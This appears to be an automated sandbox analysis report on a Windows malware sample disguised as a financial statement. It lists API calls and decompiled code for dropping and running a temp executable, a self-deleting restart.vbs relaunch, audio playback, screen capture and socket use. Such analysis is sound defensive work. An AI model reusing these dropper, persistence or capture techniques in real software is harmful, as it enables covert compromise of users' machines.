                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                        • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                        • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                          • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                        • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                        • exit.MSVCRT ref: 0040AB2A
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                        • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                        • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24,?,00408003), ref: 00407D84
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DA4
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DBE
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407DC8
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407DE8
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E02
                                          • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe,0041BA28,00415A24), ref: 00407E0C
                                          • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe), ref: 00407E2C
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                        • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                        • String ID: .exe$WDH$exepath$open$temp_
                                        • API String ID: 2802067201-3088914985
                                        • Opcode ID: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                        • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                        • Opcode Fuzzy Hash: ea03ed873efa06cf96c83a5a05f5e07c1e38d03e3efa50486efb3fa82d49440d
                                        • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00411D8A, Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E004135DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E00412E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L0041416A();
					_t36 =  &_v52;
					L00414146();
					_t37 =  &_v36;
					L0041414C();
					_t38 =  &_v20;
					L00414146();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t38, _t37, _t37, _t36, _t36, _t35, _t35, L"open \"",  &_a4, L"\" type ", E00412795( &_v84, _a20), L" alias audio");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					mciSendStringW(_t38, 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41c178, 0xa9, 0x415664);
					_t43 = CreateEventA(0, 1, 0, 0);
					 *0x41c1d4 = _t43;
					if(_t43 != 0) {
						do {
							if( *0x41c1d2 != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x41c1d2 = 0;
							}
							if( *0x41c1d3 != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x41c1d3 = 0;
							}
							mciSendStringA("status audio mode",  &_v88, 0x14, 0);
							_t50 = "stopped";
							_t88 =  &_v88;
							while(1) {
								_t86 =  *_t88;
								_t78 = _t86;
								if(_t86 !=  *_t50) {
									break;
								}
								if(_t78 == 0) {
									L14:
									_t50 = 0;
								} else {
									_t87 =  *((intOrPtr*)(_t88 + 1));
									_t79 = _t87;
									if(_t87 !=  *((intOrPtr*)(_t50 + 1))) {
										break;
									} else {
										_t88 = _t88 + 2;
										_t50 = _t50 + 2;
										if(_t79 != 0) {
											continue;
										} else {
											goto L14;
										}
									}
								}
								goto L18;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							L18:
							if(_t50 == 0) {
								SetEvent( *0x41c1d4);
							}
							if(WaitForSingleObject( *0x41c1d4, 0x1f4) == 0) {
								CloseHandle( *0x41c1d4);
								 *0x41c1d4 = 0;
							}
						} while ( *0x41c1d4 != 0);
					}
					mciSendStringA("stop audio", 0, 0, 0);
					mciSendStringA("close audio", 0, 0, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					_t47 = E004020C2(0x41c178, 0xaa, 0x415664);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t47;
			}






















                                        0x00411d8a
                                        0x00411d9b
                                        0x00411da9
                                        0x00411dae
                                        0x00411dbb
                                        0x00411dc0
                                        0x00411dc7
                                        0x00411dd0
                                        0x00411dd0
                                        0x00411dd9
                                        0x00411de4
                                        0x00411f46
                                        0x00411f55
                                        0x00000000
                                        0x00411f5b
                                        0x00411f69
                                        0x00411f79
                                        0x00411f79
                                        0x00411dea
                                        0x00411dea
                                        0x00411df9
                                        0x00411dff
                                        0x00411e04
                                        0x00411e07
                                        0x00411e24
                                        0x00411e2d
                                        0x00411e36
                                        0x00411e3a
                                        0x00411e43
                                        0x00411e47
                                        0x00411e50
                                        0x00411e54
                                        0x00411e5f
                                        0x00411e68
                                        0x00411e71
                                        0x00411e7a
                                        0x00411e86
                                        0x00411e8d
                                        0x00411ea1
                                        0x00411eb1
                                        0x00411ec1
                                        0x00411ecb
                                        0x00411ed3
                                        0x00411ed8
                                        0x00411ede
                                        0x00411ee4
                                        0x00411eee
                                        0x00411ef0
                                        0x00411ef0
                                        0x00411efc
                                        0x00411f06
                                        0x00411f08
                                        0x00411f08
                                        0x00411f1a
                                        0x00411f1c
                                        0x00411f21
                                        0x00411f24
                                        0x00411f24
                                        0x00411f26
                                        0x00411f2a
                                        0x00000000
                                        0x00000000
                                        0x00411f2e
                                        0x00411f42
                                        0x00411f42
                                        0x00411f30
                                        0x00411f30
                                        0x00411f33
                                        0x00411f38
                                        0x00000000
                                        0x00411f3a
                                        0x00411f3b
                                        0x00411f3d
                                        0x00411f40
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00411f40
                                        0x00411f38
                                        0x00000000
                                        0x00411f2e
                                        0x00411f83
                                        0x00411f85
                                        0x00411f88
                                        0x00411f8a
                                        0x00411f92
                                        0x00411f92
                                        0x00411fab
                                        0x00411fb3
                                        0x00411fb9
                                        0x00411fb9
                                        0x00411fbf
                                        0x00411ede
                                        0x00411fd3
                                        0x00411fdd
                                        0x00411fed
                                        0x00411ffd
                                        0x00412005
                                        0x00412005
                                        0x0041200e
                                        0x00412018

                                        APIs
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,00000000,?,0041B310), ref: 00411D9B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DAE
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0041B310), ref: 00411DC7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0041B310), ref: 00411DD0
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0041B310), ref: 00411DD9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411DEA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00411DF9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,open ",?," type ,00000000, alias audio,?,0041B310), ref: 00411E2D
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,0041B310), ref: 00411E3A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310), ref: 00411E47
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310), ref: 00411E54
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E5F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E68
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E71
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E7A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411E86
                                        • mciSendStringW.WINMM(00000000), ref: 00411E8D
                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00411EA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411EB1
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9), ref: 00411ECB
                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 00411EEE
                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 00411F06
                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 00411F1A
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,0041B310), ref: 00411F46
                                        • PathFileExistsW.SHLWAPI(00000000,?,0041B310), ref: 00411F4D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411F69
                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411F92
                                        • WaitForSingleObject.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FA3
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00411FB3
                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00411FD3
                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 00411FDD
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 00411FED
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(000000AA), ref: 00412005
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041200E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@SendString$??0?$basic_string@D@2@@std@@D@std@@$?c_str@?$basic_string@G@2@@0@Hstd@@V?$basic_string@$D@1@@$EventV01@@V10@$??4?$basic_string@?find@?$basic_string@?length@?$basic_string@CloseCreateExistsFileG@1@@HandleObjectPathSingleV01@V10@0@V10@@Wait
                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                                        • API String ID: 1753768752-1354618412
                                        • Opcode ID: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction ID: 390487820da651bbbca776db698e462f264097bfb23042b57de684319bca0ea3
                                        • Opcode Fuzzy Hash: 9b6a564b4307e82e3d21cd783dbd3716fbb2968f83690b74f9bece41395da60c
                                        • Instruction Fuzzy Hash: E1618271A9061CFFDB00AFA0DC89DFF3B6DEB54344B448026F902971A1DB799D848B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004089A6, Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                          • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                          • Part of subcall function 0040B692: RegOpenKeyExA.ADVAPI32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                          • Part of subcall function 0040B692: RegQueryValueExA.ADVAPI32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                          • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                        • _wgetenv.MSVCRT ref: 00408A1B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                        • exit.MSVCRT ref: 00408B3D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                        • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                        • API String ID: 864010295-1332127163
                                        • Opcode ID: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                        • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                        • Opcode Fuzzy Hash: 08749e49b553c3788604a356ede710e28e709580b22f323facabd881b8af6561
                                        • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040F5F4, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 265COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                          • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                          • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                        • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                        • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                        • _itoa.MSVCRT ref: 0040F75C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
